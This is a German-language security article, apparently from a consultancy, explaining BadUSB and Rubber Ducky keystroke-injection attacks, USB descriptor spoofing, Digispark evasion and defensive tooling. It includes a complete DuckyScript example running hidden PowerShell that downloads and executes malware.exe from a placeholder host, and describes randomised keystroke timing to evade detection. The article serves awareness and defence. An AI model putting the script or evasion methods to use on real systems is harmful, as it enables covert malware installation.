1. Manipulation der Firmware
Der Angreifer verändert die Firmware des USB-Geräts, sodass es sich als Keyboard ausgibt, obwohl es ursprünglich ein anderes Gerät war, wie ein USB-Stick.
BadUSB & Rubber Ducky: Wenn USB zur Bedrohung wird
BadUSB- und Rubber-Ducky-Angriffe nutzen gezielt Schwächen in der Erkennung von USB-Eingabegeräten aus und ermöglichen unautorisierte Befehlsausführungen auf IT-Systemen.
Ein besonders perfider Angriff ist der sogenannte BadUSB-Angriff, der über manipulierte USB-Geräte durchgeführt wird. Diese Angriffe sind schwer zu erkennen, da sie auf eine tiefere Ebene der USB-Technologie abzielen. In diesem Artikel werfen wir einen detaillierten Blick auf die Funktionsweise dieser Angriffe, die verwendeten Tools wie den Rubber Ducky USB und möglichen Schutz vor dieser Bedrohung.
Was ist ein BadUSB-Angriff?
Ein BadUSB-Angriff nutzt die vielseitige Funktionalität von USB-Geräten aus. USB-Geräte wie Mäuse, Tastaturen oder Speichersticks erscheinen zunächst als harmlose, passiv eingesteckte Geräte. Was jedoch viele nicht wissen: Diese Geräte können manipuliert werden, sodass sie unbemerkt als Eingabegeräte, insbesondere als Tastatur, agieren. Angreifer nutzen diese Möglichkeit, um durch unauffällige Tastatureingaben Befehle auf einem Computer auszuführen – ohne dass der Benutzer etwas davon merkt.
Ein Praxisbeispiel:
Ein Mitarbeiter findet einen USB-Stick, auf dem „Präsentation“ steht, und schließt ihn an seinen Computer an. Ohne sein Wissen gibt der manipulierte Stick automatisch Befehle ein, öffnet eine Kommandozeile und lädt Malware aus dem Internet herunter. Diese Art von Angriff kann auch durch den Versand von manipulierten Geräten per Post an ahnungslose Opfer durchgeführt werden.
Funktionsweise von BadUSB
Ein BadUSB-Angriff folgt einem klar strukturierten Ablauf, der es Angreifern ermöglicht, Schaden anzurichten:
2. Geräteanschluss
Beim Anschließen an das System meldet sich das manipulierte Gerät als Tastatur an. Das Betriebssystem erkennt keine Unterscheidung zwischen einem echten und einem manipulierten Gerät.
3. Automatische Befehlsausführung
Das „Tastatur“-Gerät gibt ohne Benutzerinteraktion Befehle ein.
Ein weit verbreitetes Tool für diese Angriffe ist der "Rubber Ducky" von Hak5. Es handelt sich dabei um ein USB-Gerät, das mit einer einfachen Skriptsprache programmiert werden kann, um genau diese schadhaften Aktionen auszuführen. Der zugrunde liegende Code simuliert dabei Tastatureingaben und kann so gezielt Systembefehle ausführen – vom Starten einer Kommandozeile bis hin zum Nachladen von Malware.
Beispiel-Skript für Rubber Ducky:
ATTACKMODE HID
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -NoProfile -Command “Invoke-WebRequest -Uri 'http://example.com/malware.exe' -OutFile 'C:\Users\Public\malware.exe'; Start-Process 'C:\Users\Public\malware.exe'”
ENTER
Dieses Skript wartet kurz (DELAY) und drückt dann die Tasten WINDOWS+R (GUI r). Anschließend wird mit einem Powershell Befehl Malware heruntergeladen und ausgeführt – ohne jegliche Interaktion des Nutzers.
Technische Hintergründe: Der USB-Deskriptor
Das Geheimnis der Tarnung von BadUSB-Angriffen liegt im USB-Deskriptor. Dies ist eine Datenstruktur, die von jedem USB-Gerät verwendet wird, um sich einem Host-System vorzustellen. Sie enthält wesentliche Informationen über das Gerät, wie etwa den Gerätetyp (Tastatur, Maus, Speicher), Herstellerdaten und unterstützte Funktionen (sieh Abbildung 1).
Bei einem BadUSB-Angriff wird der Deskriptor so manipuliert, dass das USB-Gerät sich als ein anderes Gerät ausgibt, in der Regel als Tastatur. Das Betriebssystem akzeptiert diese Informationen und behandelt das Gerät als legitimes Eingabegerät.
Ein Angreifer kann diesen Deskriptor modifizieren, um das manipulierte Gerät als bekannte Tastatur zu präsentieren und so bestehende Sicherheitsvorkehrungen zu umgehen.
Schutzmaßnahmen gegen BadUSB
Allgemeine Schutzmaßnahmen
Ein vollständiger Schutz vor BadUSB-Angriffen würde eine rigorose Blockierung aller USB-Geräte erfordern, was jedoch in der Praxis kaum möglich ist. Stattdessen konzentrieren sich Schutzmaßnahmen auf die Blockierung unbekannter oder neuer USB-Geräte, insbesondere auf Geräte, die als Tastaturen auftreten.
Um sich vor BadUSB-Angriffen zu schützen, sollten Unternehmen folgende Maßnahmen umsetzen:
USB-Ports auf besonders sensiblen Systemen deaktivieren oder einschränken
Unbekannte USB-Geräte nicht anschließen oder vorher prüfen lassen
Endpoint-Security-Lösungen einsetzen, die Eingabegeräte erkennen und überwachen
Mitarbeitende für den sicheren Umgang mit USB-Geräten sensibilisieren
Beispiele, wie Tools BadUSB detektieren
Wie solche Maßnahmen konkret aussehen können, zeigen zwei unterschiedliche Ansätze aus der Praxis: Eine Lösung wie ManageEngine Device Control Plus etwa setzt auf Whitelisting anhand von Parametern wie idVendor, idProduct und iSerial. Das ist ein erster Schritt – doch bleibt ein Risiko, da ein Angriffsgerät wie der Rubber Ducky genau diese Werte nachahmen kann, sofern Informationen über das Zielsystem bekannt sind.
Anders G DATA USB Keyboard Guard: Diese Lösung geht einen Schritt weiter und berücksichtigt zusätzlich die Hardware-IDs bcdDevice und Interface-Nummer. Theoretisch stark, da der Rubber Ducky hier scheitert – fehlende Kontrolle über die Deskriptor-Variablen (siehe Abbildung 2).
Beide Ansätze zeigen: Der Schlüssel liegt nicht in einer Einzellösung, sondern in einem abgestimmten Zusammenspiel aus Technologie, Prozessen und Aufmerksamkeit.
Beyond Rubber Ducky: Fortgeschrittene Angriffe
Während Rubber Ducky ein beliebtes Tool für Einsteiger ist, gibt es noch alternative Geräte, wie den Digispark. Der Digispark erlaubt eine vollständige Kontrolle über den USB-Deskriptor, sodass sich das USB-Gerät perfekt als legale Tastatur tarnen kann. Mit diesem Tool kann die USB-Firmware frei programmiert werden (siehe Abbildung 3).
Vorgehen mit Digispark:
1. Manipulation des Deskriptors
Der Angreifer stellt die Parameter exakt auf eine bekannte Tastatur ein.
2. Hinzufügen eines zweiten Interfaces
Dadurch kann eine originale Tastatur nachgeahmt werden.
3. Optional: Tarnung gegen verhaltensbasierte Erkennung
Der Digispark kann so programmiert werden, dass er Tastenanschläge in zufälligen Intervallen sendet, um eine automatisierte Erkennung zu umgehen.
Fazit
Ein absoluter Schutz gegen BadUSB-Angriffe existiert nicht. Kennt der Angreifer die genutzten Keyboards im Unternehmen, kann er per manipuliertem USB-Gerät oder Rubber Ducky Sicherheitsmechanismen unterlaufen. Nur durch eine Kombination aus robuster IT-Security und konsequentem Datenschutz lässt sich das Risiko solcher Angriffe nachhaltig minimieren.
Ein erster wichtiger Schritt ist die Härtung des Systems – dazu gehören die Vergabe minimaler Nutzerrechte sowie restriktive Ausführungskontrollen, um unerwünschte Prozesse frühzeitig zu blockieren. Falls USB-Security-Tools im Einsatz sind, sollte zudem darauf geachtet werden, dass diese möglichst viele Deskriptor-Attribute der angeschlossenen USB-Geräte überprüfen. So lassen sich potenziell gefährliche Geräte frühzeitig erkennen und ausschließen.
Sie wollen auch prüfen, ob ihre Schutzmaßnahmen umgangen werden können? Melden Sie sich bei uns.